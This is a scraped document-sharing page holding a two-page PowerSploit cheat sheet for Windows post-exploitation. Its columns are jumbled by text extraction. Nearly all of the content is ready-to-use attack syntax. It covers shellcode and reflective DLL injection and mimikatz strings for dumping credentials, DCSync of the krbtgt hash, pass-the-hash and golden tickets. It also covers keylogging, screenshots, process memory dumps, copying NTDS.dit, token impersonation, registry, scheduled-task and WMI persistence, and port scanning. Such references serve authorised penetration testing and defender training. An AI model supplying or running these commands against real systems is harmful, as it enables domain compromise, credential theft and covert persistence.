KEMBAR78
PowerSploit Cheat Sheet v1.1 Guide | PDF | Computer File | Thread (Computing)
0% found this document useful (0 votes)
758 views2 pages

PowerSploit Cheat Sheet v1.1 Guide

PowerSploit is a PowerShell framework that contains various tools and scripts for penetration testing. Some key capabilities include code execution on remote systems using WMI, reflective injection, or scheduled tasks. It also contains tools for credential dumping such as mimikatz, capturing screenshots, port scanning, and more. The cheat sheet provides examples of commands to use these tools along with explanations of common options.

Uploaded by

cayu8138
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
758 views2 pages

PowerSploit Cheat Sheet v1.1 Guide

PowerSploit is a PowerShell framework that contains various tools and scripts for penetration testing. Some key capabilities include code execution on remote systems using WMI, reflective injection, or scheduled tasks. It also contains tools for credential dumping such as mimikatz, capturing screenshots, port scanning, and more. The cheat sheet provides examples of commands to use these tools along with explanations of common options.

Uploaded by

cayu8138
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

PowerSploit Cheat Sheet Switch, inject shellcode w/o -Force Optional- one or more remote -ComputerName

prompting for confirmation computers to run the script on. "comp1","comp2"


Invoke-WmiCommand executes a PowerShell code on a Custom Mimikatz commands -Command
target computer(s) using WMI as a pure C2 channel. (note: enclose in single quotes) '"CMD1" "CMD2"'
The scriptblock to run on the -Payload { … } Useful custom Invoke-Mimikatz commands:
target(s) Extract MSCache '"token::elevate"
Getting Started Optional- one or more remote -ComputerName hashes "lsadump::cache"
Get PowerSploit: http://bit.ly/28RwLgo computers to run the script "comp1", "comp2" "token::revert"'
PowerSploit Authors: @mattifestation, @obscuresec, on. Export Kerberos '"standard::base64"
@JosephBialek, @harmj0y, @secabstraction, An optional PSCredential -Credential $Cred tickets as base64 "kerberos::list /export"'
@RichLundeen object to use for remote blobs
execution (default=current DCSync the KRBTGT '"lsadump::dcsync
Mimikatz Authors: @gentilkiwi and Vincent LE TOUX
user) hash for /user:krbtgt
Docs: http://powersploit.readthedocs.io/
Exfiltration ‘domain.local’ /domain:domain.local"'
Note: not all PowerSploit functions are covered, and not
Get-GPPPassword will decrypt any found passwords set Spawn a process with '"sekurlsa::pth /user:user
all options for covered functions are covered. PowerView
through Group Policy Preferences. alternate NTLM /domain:domain.local
and PowerUp have their own cheat sheets.
credentials /ntlm:<NTLM>
Get-Keystrokes will log keys pressed (along with the time
CodeExecution /run:cmd.exe"'
and active window) to a file.
Invoke-ReflectivePEInjection will reflectively load a Willy Wonka’s Golden '"kerberos::golden
Path for the output log file, -LogPath <PATH>
DLL/EXE into powershell.exe or a remote process. Ticket Generator /user:<USER>
defailts to $Env:Temp\key.log
A byte array with the -PEBytes @(…) /krbtgt:<NTLM>
The internal (in minutes) to -Timeout <X> /domain:domain.local
PE/DLL to load
capture keystrokes. Default is /sid:<DOMAIN_SID> /ptt"'
Optional- one or more -ComputerName indefinite.
remote computers to run "comp1","comp2" Purge Kerberos tickets '"kerberos::purge"'
Get-TimedScreenshot will take screenshots on an
the script on. Invoke-NinjaCopy can copy locked files from a system by
interval and save them to disk.
Optional arguments to -ExeArgs "Arg1 Arg2…" opening up raw disk access and parsing the NTFS
The folder path to save -LogPath <PATH> structures. This is useful for cloning off things like
pass to the loaded PE
screenshots NTDS.dit and SYSTEM hives.
Optional process name to -ProcName <NAME>
The internal (in seconds) -Interval <X> Full path of the file to -Path
load the PE into
between taking screenshots copy C:\Windows\NTDS\NTDS.dit
Optional process ID to load -ProcId <ID>
the PE into When the script should stop -EndTime HH-MM Local destination to -LocalDestination
running, HH-MM format copy the file to C:\Temp\NTDS.dit
Invoke-Shellcode will inject shellcode into
Invoke-Mimikatz uses Invoke-ReflectivePEInjection to Destination on remote -RemoteDestination
powershell.exe or a remote process. Shellcode should be
inject Mimikatz into memory. By default it will run the server to copy file to C:\Temp\NTDS.dit
in the form of a byte array (e.g. 0xXX,0xXY,.. )
sekurlsa::logonpasswords module.
To convert a raw shellcode file in Bash, run the following: Optional- one or more -ComputerName "comp1",
To update the Mimikatz code, select the remote computers to "comp2"
hexdump -ve '/1 "0x%02x,"' file.bin |sed 's/.$//'
“Second_Release_PowerShell” compile target in the run the script on.
Process ID to inject shellcode into -ProcessID <ID> Mimikatz project, compile for both Win32 and x64,
Byte array of shellcode to inject -Shellcode base64 –w 0 powerkatz.dll, and replace the base64-DLL
@(0xXX,0xXY…) strings in Invoke-Mimikatz.

Version 1.1 - Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.
Invoke-TokenManipulation manipulates tokens and is Switch, use a userland -ScheduledTask Recon
roughly equivalent to Incognito. scheduled task Invoke-Portscan is a simple threaded port scanner that
Switch. Enumerate unique -Enumerate Run the schtask after one -OnIdle mimics nmap’s options.
usable tokens minute of idling Hosts to scan, in hostname, -Hosts host1,host2,…
Displays current credentials for -WhoAmI Run the schtask hourly -Daily IP, or CIDR format -Hosts 192.168.1.0/24
the powershell.exe process Run the schtask hourly -Hourly File with host specifications -HostFile .\hosts.txt
Switch. Revert to original token -RevToSelf Run the schtask at the -At HH:MM Comma-separated list of -ExcludeHosts host3,
context specified time hosts to exclude host4
Switch. Show ALL tokens -ShowAll New-ElevatedPersistenceOption builds an elevated Ports to scan -Ports 21,80-100
Create an alternate process with -CreateProcess option set usable by Add-Persistence Scan the X most common -TopPorts <50-1000>
a given token- use with "cmd.exe" Switch, persist via the -Registry ports
Username/ ProcessId/ThreadId CurrentVersion\Run key Exclude ports from scan -ExcludedPorts X,Y
Specify the token to -Username <X> Switch, use a SYSTEM -ScheduledTask
impersonate by username Treat all hosts as online -SkipDiscovery
scheduled task
Specify the token to -ProcessId <Y> Ping scan only (disable port -PingOnly
Switch, use a permanent -PermanentWMI scan)
impersonate by process ID WMI subscription
Specify the token to -ThreadId <Z> Number of threads to use, -Threads <X>
Run the schtask after one -OnIdle defaults to 100
impersonate by thread ID minute of idling
Switch, use if created process -NoUI Timeout (in milliseconds) -Timeout <Y>
Run the schtask hourly -Hourly for each port check
doesn’t need a UI
Run the schtask/registry -AtLogon Number of hosts to -nHosts <Z>
Out-Minidump generates a full-memory minidump of a payload on any user logon
process, similar to procdump.exe with the ‘-ma’ switch. concurrently scan
Run the schtask/WMI sub -Daily Performance options, -T [1-5]
Example: dump memory of all processes to C:\Temp: daily
Get-Process | Out-Minidump -DumpFilePath C:\Temp higher is more aggressive
Run the schtask/WMI sub -At HH:MM Greppable output -GrepOut <file>
The process object to -Process (Get-Process -Id at the specified time
dump memory for, 4293) XML output -XMLOut <file>
passable on the pipeline Run the WMI sub within 5 -AtStartup
min of system boot Readable output -ReadableOut <file>
Path to save the memory -DumpFilePath .\file.dmp All output formats -AllformatsOut <file>
dump to, defaults to Run the schtask at the -At HH:MM
.\processname_id.dmp specified time Suppress console output, -quiet
Add-Persistence adds persistence capabilities to a script. useful for large scans
Persistence
Payload script block -ScriptBlock {…} More Information
New-UserPersistenceOption builds a user-land option
set usable by Add-Persistence Payload file -FilePath .\file.ps1 https://github.com/PowerShellMafia/PowerSploit

Switch, persist via the -Registry Elevated -ElevatedPersistenceOption $X http://www.exploit-monday.com/


CurrentVersion\Run key persistence options https://obscuresecurity.blogspot.com/
Switch, run the registry -AtLogon Userland -UserPersistenceOption $Y https://clymb3r.wordpress.com/
payload on any user logon persistence options http://blog.harmj0y.net/

Version 1.1 - Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.

You might also like